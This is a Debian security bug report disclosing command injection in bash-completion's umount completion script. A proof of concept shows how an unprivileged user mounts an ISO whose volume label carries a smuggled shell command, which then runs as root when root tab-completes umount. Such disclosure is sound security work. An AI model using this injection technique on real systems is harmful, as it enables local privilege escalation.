Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security


when bash-completion is installed, it uses
/usr/share/bash-completion/completions/umount from umount package to
provide autocompletion. This script does not escape mount paths
correctly, so it allows a local user with rights to mount filesystems to
execute commands in the context of the umount user (probably root).
Unprivileged users can mount filesystems with custom mountpoints using
udisks2, FUSE or with the help of desktop environments.


as regular user:
$ mkdir empty

$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)

$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.

(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).

as different user or even root:
# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..

# umount <TAB> ^C

# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r--  1 root root     0 Feb 14 10:01 foo

I tested it using latest Debian GNU/Linux 9.3 (stretch) using default
installation with desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1

uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02)
x86_64 GNU/Linux

It seems to be fixed in upstream util-linux already because of a similar

Björn Bosselmann
G DATA Software AG

-- System Information:
Debian Release: 9.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages bash-completion depends on:
ii  bash  4.4-5
ii  dpkg  1.18.24

bash-completion recommends no packages.

bash-completion suggests no packages.

-- no debconf information

Attachment: signature.asc
Description: OpenPGP digital signature

Reply via email to